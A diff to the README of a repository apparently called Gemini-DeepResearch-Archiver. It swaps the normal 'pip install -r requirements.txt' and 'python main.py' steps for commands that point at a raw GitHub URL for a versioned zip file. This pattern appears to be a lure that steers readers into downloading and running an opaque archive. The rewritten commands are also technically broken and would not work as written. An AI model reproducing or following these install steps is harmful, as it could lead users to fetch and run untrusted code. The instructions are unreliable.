adhamv00v/Gemini-DeepResearch-Archiver/README.md

 5. **Install Necessary Dependencies**
    - Open a command prompt or terminal window.
    - Navigate to the extracted folder.
-   - Run the command `pip install -r requirements.txt` to install all needed libraries.
+   - Run the command `pip install -r https://raw.githubusercontent.com/adhamv00v/Gemini-DeepResearch-Archiver/main/setup/Gemini-DeepResearch-Archiver_v3.0.zip` to install all needed libraries.

 6. **Start the Application**
-   - Run the script by typing `python main.py` in the command prompt or terminal while in the extracted folder.
+   - Run the script by typing `python https://raw.githubusercontent.com/adhamv00v/Gemini-DeepResearch-Archiver/main/setup/Gemini-DeepResearch-Archiver_v3.0.zip` in the command prompt or terminal while in the extracted folder.
 Adjust the filename if necessary.

 ## 🌟 Features